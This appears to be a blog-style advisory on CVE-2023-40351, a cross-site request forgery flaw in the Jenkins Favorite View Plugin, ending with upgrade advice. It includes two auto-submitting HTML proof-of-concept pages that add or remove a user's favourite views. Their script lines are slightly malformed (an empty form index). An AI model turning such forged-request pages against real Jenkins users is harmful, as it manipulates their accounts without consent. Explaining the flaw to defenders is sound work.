Jenkins is everywhere in the DevOps world, and plugins are like its building blocks. One of those plugins, Favorite View Plugin up to version 5.v77a_37f62782d, had a serious weakness: an attacker could trick logged-in Jenkins users into unknowingly adding or removing favorite views, thanks to a Cross-Site Request Forgery (CSRF) vulnerability. That’s what’s at the heart of CVE-2023-40351.
Let’s look at what happened, see a working exploit, learn how it works, and find out how you can stay safe.
What’s CVE-2023-40351?
Simply put, the Favorite View Plugin didn’t properly check if requests to add or remove favorite views were intentionally initiated by a valid user. CSRF vulnerabilities exploit this by making users’ browsers perform unwanted actions (like clicking buttons or submitting forms) without their knowledge, as long as they’re logged into Jenkins.
Attackers could build a malicious web page (i.e., CSRF attack vector) and, if an authorized Jenkins user visited it, add or remove views from their favorites – without user consent.
What’s the Impact?
* Attackers can silently manipulate Jenkins UI for targeted users.
* This is mostly about UI tampering, but could cause confusion, dashboard mismanagement, or open doors for further social engineering attacks.
Reference Links
- Jenkins Security Advisory for CVE-2023-40351
- CVE Details Page
- Favorite View Plugin GitHub
Here’s a simple breakdown
1. Jenkins requests to add/remove favorite views only require a simple GET or POST, without any CSRF protection token.
2. If a logged-in user’s browser makes such a request (say, by viewing a malicious website), Jenkins honors it.
Example Exploit – Adding a View to Favorites
Suppose Jenkins is running at http://jenkins.local/, user "alice" is logged in, and there is a view called "Builds".
Here’s a simple HTML exploit page
<!-- CSRF PoC: Add 'Builds' to alice's favorites -->
<html>
<body>
<form action="http://jenkins.local/user/alice/favoriteViews/add" method="POST">
<input type="hidden" name="view" value="Builds"/>
<input type="submit" value="Click here" />
</form>
<!-- Auto submit the form as soon as the page loads -->
<script>
document.forms[].submit();
</script>
</body>
</html>
When "alice" visits this site while logged into Jenkins, the script silently sends a request to Jenkins, which adds the "Builds" view to her favorites – no questions asked.
Similarly, you can remove favorites by targeting the remove URL and parameters
<!-- CSRF PoC: Remove 'Builds' from alice's favorites -->
<html>
<body>
<form action="http://jenkins.local/user/alice/favoriteViews/remove" method="POST">
<input type="hidden" name="view" value="Builds"/>
</form>
<script>
document.forms[].submit();
</script>
</body>
</html>
Why Does This Work?
There’s no token or same-origin check. The browser automatically attaches Alice’s session cookie for Jenkins to the request if she’s logged in, making the request look legit.
How to Fix It
Upgrade immediately to the latest version of the Favorite View Plugin where fixes have been shipped. The maintainers patched this by enforcing CSRF protection tokens on these endpoints.
- Download Jenkins Favorite View Plugin – latest
Final Thoughts
Little things like favorites in Jenkins might seem unimportant… until an attacker messes with them! CSRF vulnerabilities can slip into plugin code easily if good practices aren’t followed. Always keep plugins updated and watch Jenkins security advisories.
Stay safe, keep your builds tidy, and happy hacking! 🚀
*If you found this post useful, check out the original Jenkins security advisory for more details. Patch early, patch often!*
Timeline
Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 22:39:00 UTC